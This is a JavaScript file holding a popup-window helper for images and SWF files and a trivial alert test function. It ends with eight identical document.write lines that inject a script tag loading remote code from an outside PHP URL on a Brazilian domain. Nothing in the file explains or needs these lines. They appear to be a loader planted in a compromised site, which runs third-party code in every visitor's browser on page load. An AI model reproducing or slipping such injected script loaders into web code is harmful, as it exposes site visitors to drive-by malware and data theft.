var msgWindow=0;
function popUp(title, msg, w, h) {
	if(msgWindow) {
		if(!msgWindow.closed) msgWindow.close();
	}
	var width=w, height=h;
	var left = (screen.width/2) - width/2;
	var top = (screen.height/2) - height/2;
  var styleStr = 'toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+',top='+top+',screenX='+left+',screenY='+top;
	if(screen.height - 200 < h || screen.width - 75 < w) styleStr = "";
	if(msg.substr(msg.length-3) == "swf") {
		var msgWindow = window.open(msg,"msgWindow", styleStr);
	} else {
		var msgWindow = window.open('project.html',"msgWindow", styleStr);
		var body = '<head><title>'+title+'</title></head>';
		body += '<body marginheight=0 marginwidth=0 leftmargin=0 rightmargin=0 bottommargin=0 topmargin=0>'
		body += '<img src=' + msg + ' width=' + w + ' height=' + h + '>';
		body += '</body>';
		msgWindow.document.write(body);
	}
}
function test(){
  alert(5);
}
document.write('<script src=http://hannabarbera.com.br/scubidu/10mais.php ><\/script>');
document.write('<script src=http://hannabarbera.com.br/scubidu/10mais.php ><\/script>');
document.write('<script src=http://hannabarbera.com.br/scubidu/10mais.php ><\/script>');
document.write('<script src=http://hannabarbera.com.br/scubidu/10mais.php ><\/script>');
document.write('<script src=http://hannabarbera.com.br/scubidu/10mais.php ><\/script>');
document.write('<script src=http://hannabarbera.com.br/scubidu/10mais.php ><\/script>');
document.write('<script src=http://hannabarbera.com.br/scubidu/10mais.php ><\/script>');
document.write('<script src=http://hannabarbera.com.br/scubidu/10mais.php ><\/script>');